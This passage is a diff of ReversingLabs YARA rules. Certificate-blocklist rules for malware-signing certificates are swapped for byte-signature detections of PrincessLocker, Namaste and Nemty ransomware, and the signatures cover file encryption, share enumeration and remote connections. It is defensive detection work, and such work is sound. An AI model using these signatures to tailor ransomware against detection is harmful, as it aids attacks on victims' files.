+            05 ?? ?? ?? ?? ?? 8D 3D ?? ?? ?? ?? 33 C9 C6 07 ?? 47 41 81 F9 ?? ?? ?? ?? 75 ?? C7
+            05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A
+            ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 81 3D
+            ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 F0 46 8A 06 3C ?? 0F 85 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+        }
+		$encrypt_file_2 = {
+            A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 81 3D ?? ?? ?? ??
+            ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 2D ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? A3 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ??
+            ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ??
+            ?? ?? ?? E8
+        }
+		$remote_server_1 = {
+            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 83 F8 ?? 72 ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? E8
+        }
+		$remote_server_2 = {
+            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
+        }
+		$enum_shares_and_encrypt_files = {
+            E8 ?? ?? ?? ?? C1 C8 ?? BA ?? ?? ?? ?? 23 D0 60 83 FA ?? 75 ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? 8D 35 ?? ?? ?? ?? 60 68 ?? ?? ?? ?? 56 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 61 8A 06 46 0A C0 75 ?? 8A 06 0A C0 75 ?? 61 D1 C8 8A 1D ??
+            ?? ?? ?? FE C3 88 1D ?? ?? ?? ?? 80 FB ?? 76 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLIM DOG GROUP SP Z O O" and pe.signatures [ i ] . serial == "0d:dc:e8:cd:c9:1b:5b:64:9b:b4:b4:5f:fb:ba:6c:6c" and 1580722435 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $remote_server_1 and $remote_server_2 and $enum_shares_and_encrypt_files
 }
-
-rule REVERSINGLABS_Cert_Blocklist_9Bd614D5869Bb66C96B67E154D517384 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Princesslocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects PrincessLocker ransomware."
 		author = "ReversingLabs"
-		id = "eb42b516-aac6-5bee-af1d-70e0e66700f5"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "b76ef137-aa0b-5fd3-9876-2459cb6535ff"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3752-L3770"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d9eea38a1340797cef129b12cf2bb46c444e6f312db7356260f0ac0d9e63183d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.PrincessLocker.yara#L1-L92"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5be4ca3bd0b0afed1d2f3a59e2951d74a8de94c5a4d5a2c6cc29add49eab9ec0"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "PrincessLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45
+            ?? 50 53 FF D7 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? FF D6 85 C0 75 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 53 FF D7 68 ?? ?? ??
+            ?? 8D 4D ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 89 9D ?? ?? ?? ?? 85 DB 75 ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 8B 30 89 B5 ?? ?? ?? ?? 3B F0 0F 84 ?? ?? ?? ?? 33 C9 C6 45 ?? ?? 6A ?? 51 8D
+            46 ?? 66 89 8D ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ??
+            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ??
+            66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 FF 75 ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? C6 45 ?? ?? 8B CC
+            33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ??
+            C3 C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
+            45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
+            68 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D BD ?? ??
+            ?? ?? 6A ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 6A ?? 0F 43 BD ?? ?? ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ??
+            ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF
+            ?? 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 8D 85 ?? ??
+            ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 39 85 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            0F B6 C9 0F 46 C8 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 0F B6 C1 6A ?? 50 6A ?? FF
+            B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 FF 15
+        }
+		$remote_connection_1 = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F 85 ?? ?? ??
+            ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 45 ?? ??
+            ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$remote_connection_2 = {
+            BA ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 66 C7 45 ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 55 ?? C6 45
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56
+            8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8B D0 C6 45 ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 53 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
+            ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"CENTR MBP\"" and ( pe.signatures [ i ] . serial == "00:9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84" or pe.signatures [ i ] . serial == "9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84" ) and 1581618180 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_connection_1 and $remote_connection_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_540Cea639D5D48669B7F2F64 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Namaste : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Namaste ransomware."
 		author = "ReversingLabs"
-		id = "bfc514b6-43ef-5343-b5f2-d39168ba3e8d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "e85d7ec3-367b-5bde-a570-8caa1f6cd61b"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3772-L3788"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3d3774f10ff9949ea13a7892662438b84b3eb895fc986092649fa9b192170d48"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Namaste.yara#L1-L81"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5a952276f41b5524bcb82a9ceb076983d2faf2864b3bbd0a06d49bbd5edc1e0e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Namaste"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 02 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32
+            ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 08 09 9A 13 ?? 02 11 ?? 28 ?? ??
+            ?? ?? 17 28 ?? ?? ?? ?? 09 17 58 0D 09 08 8E 69 32 ?? DE ?? 26 DE ?? 2A
+        }
+		$find_files_p2 = {
+            02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 17 2A 03 6F ?? ?? ?? ??
+            0A 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
+            ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2C ?? 03 72 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 2D ?? 16 2A 03 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 03 73 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            20 ?? ?? ?? ?? 6A 31 ?? 16 0C DE ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ??
+            2A 08 2A
+        }
+		$encrypt_files_p1 = {
+            02 03 28 ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 2C ?? 02 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            02 7B ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 02 03 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 02 7B ?? ?? ?? ?? 2C ?? 03 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 2C ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2A
+        }
+		$encrypt_files_p2 = {
+            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 20 ?? ?? ??
+            ?? 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
+            ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1B 28 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F
+            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 02 07
+            28 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            DC 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
+        }
+		$encrypt_files_p3 = {
+            28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 26 73 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            06 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 18 6F ?? ?? ?? ?? 04 14 73 ?? ?? ?? ?? 0B 06 07 06
+            6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 07 06 6F ?? ?? ?? ?? 1E 5B 6F ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 06 1A 6F ?? ?? ?? ?? 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ??
+            ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 03 19 73 ?? ?? ?? ?? 13 ?? 20 ??
+            ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 2B ?? 09 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11
+            ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 30 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 09
+            2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 03 28 ?? ?? ?? ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CENTR MBP LLC" and pe.signatures [ i ] . serial == "54:0c:ea:63:9d:5d:48:66:9b:7f:2f:64" and 1570871755 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_03A7748A4355020A652466B5E02E07De : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Nemty : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Nemty ransomware."
 		author = "ReversingLabs"
-		id = "10134543-04fa-5a2f-8f77-98444ad1d7f0"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c56ecd32-5903-5bcc-aa69-a070f2c247c4"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3790-L3806"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6dc6d0fd2b702939847981ff31c2d8103227ccd0c19f999849ff89c64a90f92f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Nemty.yara#L1-L205"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dc8cfdcdea8ecb2018b1b04bb1b645f6dbdc6c07357719100677c75945edef40"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Nemty"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 33 DB 68 ?? ?? ?? ?? 8D 75
+            ?? 89 5D ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00
+            53 53 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 6A
